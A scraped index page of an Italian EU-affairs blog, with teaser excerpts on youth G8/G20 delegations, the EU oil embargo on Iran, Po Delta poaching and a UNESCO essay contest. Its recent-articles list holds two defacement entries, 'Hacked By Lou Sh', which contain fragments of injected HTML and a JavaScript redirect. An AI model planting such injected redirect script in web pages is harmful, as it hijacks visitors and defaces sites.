EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Organi internazionali

Organi internazionali


Organi internazionali

it

La metà di loro ha deciso di emigrare: forse per libera scelta. O forse perché in Italia la fuga dei cervelli non è soltanto una chiacchiera da bar. Una cosa però è certa: questi ragazzi sono pronti a rientrare per rappresentare il proprio Stato! È pronta infatti la delegazione giovanile italiana che volerà al Y8, il side-event del G8, in programma a Londra dal 24 al 28 giugno.

Le otto figure richieste al Summit hanno ora un volto e un nome. E forse a Londra non si farà la storia, ma finalmente si farà buona politica, partendo dal basso con impegno, dedizione e passione.

La delegazione

Il gruppo sarà guidato da Marco Garlatti, in veste di capo dello Stato: “Penso che da (...)

it

Se sei appassionato di diplomazia e vuoi rappresentare il tuo Paese nei più importanti Summits internazionali non prendere impegni dal 17 al 24 giugno 2013! YAS, Young Ambassadors Society, ti dà l’opportunità di diventare Delegato e rappresentare l’Italia ai Forum dei governi più industrializzati al mondo.

Y20 Russia

Dal 17 al 22 giungo 2013 in Russia, nell’affascinante cornice offerta dalla città di San Pietroburgo si svolgerà il Youth20 (Y20), il side event giovanile ufficiale del G20. Il Summit Y20 verterà su temi prettamente economici e finanziari. Le due grandi aree tematiche di riflessione (...)

it

Washington DC ha ospitato, dal tre al nove giugno, la settima edizione del G8&G20 Youth Summits. Si tratta di eventi giovanili che si svolgono, ogni anno, parallelamente ai celebri incontri internazionali dei Leaders mondiali, riunendo centinaia di giovani e brillanti studenti provenienti da tutti i paesi del G20.

Dopo i primi incontri virtuali per la stesura dell’Agenda dei temi di discussione, i giovani Ministri si trovano a dibatterne in prima persona attorno al tavolo di negoziazione. Tutto questo porta, infine, alla stesura di un comunicato Finale, conosciuto col nome di Final Communiqué, di cui vi (...)

it

Con l'espansione dei BRICS, l'ascesa di nuove potenze, la crisi di vecchi protagonisti: quale corso prenderanno gli eventi dei vertici internazionali G8 & G20? La soluzione nel dibattito tra già noti attori e nuove giovani realtà.

Anche il G20 di Los Cabos è giunto alla sua conclusione. Dopo due giorni di negoziazioni, il 19 giugno i Leaders sono giunti alla firma della Declaration. Quattordici pagine, contenenti ottantacinque punti nei quali vengono discussi i più importanti temi di attualità internazionale e che (...)

it

Washington, questa è la location che ospiterà i Summit giovanili del G8&G20, nonché il Summit G8 dei Leader mondiali. Scoprite con noi i nomi dei ragazzi che hanno superato le selezioni di YAS e che avranno l'onore di rappresentare il nostro Paese in occasione degli Youth Summits 2012.

La Young Ambassadors Society mette in campo l’ufficiale delegazione italiana che prenderà parte ai Summit di Washington, il prossimo giugno. Dario Mazzella, Zana Nanic, Carmine Finelli, Fabrizio Ventriglia, SimoneTinelli, Francesca Carta, Caterina Bologni, Lorenzo Bettini, Giuseppe Tomaselli e (...)

it

Da mesi sui social network circolano immagini allarmanti ed appelli a boicottare i prossimi Europei di calcio al grido di "STOP KILLING DOGS FOR THE UEFA EURO 2012". Cosa succede?

La 14° edizione dei campionati europei di calcio avrà luogo dall’8 giugno al 1 luglio 2012 in Polonia ed in Ucraina, le quali, da tempo hanno messo in campo tutte le forze a loro disposizione per concludere i lavori in tempo e riuscire ad offrire dei servizi adeguati alle masse di sportivi che (...)

it

Come ben sappiamo, l’economia globale, volendo usare un eufemismo, non naviga in acque tranquille. Le istituzioni bancarie sono sotto costante pressione e il rischio di una debacle è sempre dietro l'angolo. Per evitare che la situazione peggiori ulteriormente occorre dare risposte rapide e strategicamente efficienti, figlie di approfondite conoscenze economiche e di una smisurata capacità di rinnovamento e adattamento alle fluttuanti dinamiche del mercato globale. Chi meglio di un ricercatore in campo economico, distintosi eccellentemente durante la propria carriera, può fornire tali risposte?

  • Brevi cenni storici: Wim Duisenberg

La borsa di studio è intitolata ad una delle figure più importanti nel campo economico-finanziario dal dopoguerra ad oggi. Stiamo parparlando di Willem Frederik Duisenberg, meglio noto come Wim Duisenberg. Nella sua carriere, Mr.Euro, come molti lo chiamavano (...)

it

Il Commissario europeo dell’ambiente, Janez Potočnik, ha annunciato l’avvio di un’inchiesta volta a verificare la presenza di postazioni abusive di caccia sul Delta del Po, garantendo in questo modo l’adozione di eventuali provvedimenti al fine di porre fine al bracconaggio. Numerose sono state le segnalazioni avanzate dal WWF, il quale ha anche avviato una raccolta di firme online per poter incentivare la soluzione del problema.

Dopo le continue denunce arrivate dal WWF e dalla LIPU (Lega Italiana Protezione Uccelli) sull’esistenza di appostamenti abusivi di caccia nel Parco del Delta del Po, incisiva arriva la risposta del Commissario europeo all’ambiente, Janez Potočnik. Constatando l’inadeguatezza delle misure di (...)

it

“Creare il futuro che vogliamo”, questa è la parola d’ordine nonché tema proposto per quest’anno dal Concorso Internazionale di Componimento per i Giovani, organizzato dalla Fondazione Goi Peace e dall’UNESCO. Si tratta di un concorso annuale di componimento rivolto, in via esclusiva, ai giovani di età non superiore ai 25 anni.

Obiettivo di questo concorso è quello di porre la società in ascolto della voce dei giovani, di dare spazio alle loro iniziative per costruire le fondamenta del futuro, di prendere in considerazione le loro aspettative e speranze nonché le loro originali e innovative idee.

Un tema che rispecchia (...)

it

Con un accordo del 23 gennaio scorso, i Paesi membri europei hanno optato per un embargo petrolifero totale nei confronti dell’Iran mettendo quindi al bando il greggio esportato dal Paese. Il provvedimento non avrà effetto immediato ma inizierà da luglio 2012.

Lo scorso lunedì a Bruxelles, i rappresentanti degli Stati dell’Unione europea hanno deciso di muoversi uniti nei confronti dell’Iran e del suo molto discusso programma nucleare decretando sanzioni e provvedimenti nei confronti dello Stato medio - orientale. L’accordo tra i 27 prevede la (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France